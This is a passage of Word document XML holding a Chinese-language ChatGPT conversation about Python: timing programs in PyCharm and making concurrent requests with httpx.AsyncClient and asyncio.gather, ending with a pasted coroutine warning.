    <w:p w14:paraId="40A64897" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463B9069" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def fetch_data(client, url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761FF7E3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    response = await client.get(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4375C74F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(response.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186C07AE" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="036F59DC" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D6F083" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient() as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD5B626" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        await fetch_data(client, 'http://example.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB97A23" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        await fetch_data(client, 'http://anotherexample.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188F829C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="549251BE" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C56D346" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F3D175" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，我们创建了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fetch_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，该函数接受一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例和一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为参数，然后使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例发送一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求到提供的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并打印响应内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B77C14" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F1FC76F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数中，我们创建了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例，并用它来执行两次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fetch_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，每次都提供了不同的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7132C1B1" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="433D915F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这就是如何使用同一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例发送多个请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFEBCE9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A1F07D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何让程序运行或者调试的时候输出运行时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D93CDF0" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A506AEB" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A22A797" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PyCharm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内置模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来计算并打印你的程序运行时间。你可以在你的程序的开始和结束时分别获取当前的时间，然后用结束时间减去开始时间得到运行时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E842D1C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC38289" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是一个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7382E1" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C70EC06" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531B6670" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D35C2BC" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C7D49" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CDF554D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED84783" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3C2C95" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你的代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11870841" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04545AF7" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>end_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333275CC" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31DDD233" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行时间：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", end_time - start_time, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D5C61F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151E53B4" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段代码将会在程序运行结束时打印出程序的运行时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477DDBF5" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="426C2F5A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：以上方法提供的是运行时间的大概值，因为操作系统可能在执行你的程序的过程中进行了上下文切换，使得其它程序得以运行。如果你需要更准确的运行时间，可以考虑使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>用专门的性能分析工具，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cProfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B61785F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7553A4D5" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我如何使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对我刚才说的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpx.AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重复使用，同时并发请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E774CB" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E785B7F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5B097A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的任务创建函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.create_task() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来并发执行多个协程。下面是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpx.AsyncClient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行并发请求的示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21876E34" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="639B9568" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BFB2C9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3ABA75" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import httpx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B101ADB" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E3233D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BCBD9A3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def fetch_data(client, url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0669336F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    response = await client.get(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE6EE7D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return response.text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1257D7A0" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF7E107" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1680A376" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient() as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600B9824" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        urls = ["http://example.com", "http://anotherexample.com", "http://yetanotherexample.com"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D898B6" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tasks = [fetch_data(client, url) for url in urls]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B674CB8" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        responses = await asyncio.gather(*tasks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F6F714" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for response in responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617171A3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            print(response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58215CF8" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F87F5F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623B1ADA" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10821802" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，我们先创建了一个任务列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tasks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其中每个任务都是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> fetch_data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程的实例，然后我们使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather(*tasks) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来并发运行这些任务。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.gather() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会等待所有的任务完成，然后返回一个列表，其中每个元素都是相应任务的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DFAD09" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44FE27D5" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：在真实的使用场景中，你需要处理可能出现的网络错误，例如请求超时、连接错误等。你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> try/except </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> fetch_data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数中捕获这些错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654AEFFE" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E5C668" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sys:1: RuntimeWarning: coroutine 'querySploitus' was never awaited</w:t>
      </w:r>
    </w:p>
